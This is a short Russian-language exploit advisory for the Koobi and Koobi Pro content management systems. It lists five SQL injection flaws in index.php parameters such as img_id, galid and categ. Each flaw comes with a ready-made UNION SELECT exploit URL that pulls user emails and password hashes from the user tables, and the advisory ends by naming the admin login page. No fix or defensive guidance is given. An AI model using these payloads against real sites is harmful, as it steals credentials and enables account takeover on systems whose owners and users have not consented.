Программа:
Koobi 4.4/5.4
Koobi Pro 6.25
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
1) Уязвимость существует из-за недостаточной обработки входных данных в параметре «img_id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
index.php?p=gallerypic&img_id=-1+union+select+0,1,2, concat(email,0x3a,pass),4,5,6,7,8+from+koobi4_user
index.php?p=gallerypic&img_id=-1+union+select+0,1,2, concat(email,0x3a,pass),4,5,6,7,8+from+koobi_user
2) Уязвимость существует из-за недостаточной обработки входных данных в параметре «galid» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
index.php?area=1&p=gallery&action=showimages&galid=-1+union+ select+0,concat(email,0x3a,pass),2+from+kpro_user
3) Уязвимость существует из-за недостаточной обработки входных данных в параметре «galid» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
index.php?p=gallerypic&img_id=S@BUN&galid=-1+union+select+ 0,concat(email,0x3a,pass),2+from+kpro_user
4) Уязвимость существует из-за недостаточной обработки входных данных в параметре «categ» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
index.php?p=shop&show=showdetail&fid=S@BUN&categ=-1+ union+select+0,concat(email,0x3a,pass),2+from+kpro_user
5) Уязвимость существует из-за недостаточной обработки входных данных в параметре «categ» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
index.php?showlink=S@BUN&fid=S@BUN8&p=links&area=1&categ=-1+ union+select+0,concat(email,0x3a,pass),2+from+kpro_user admin login=admin/login.php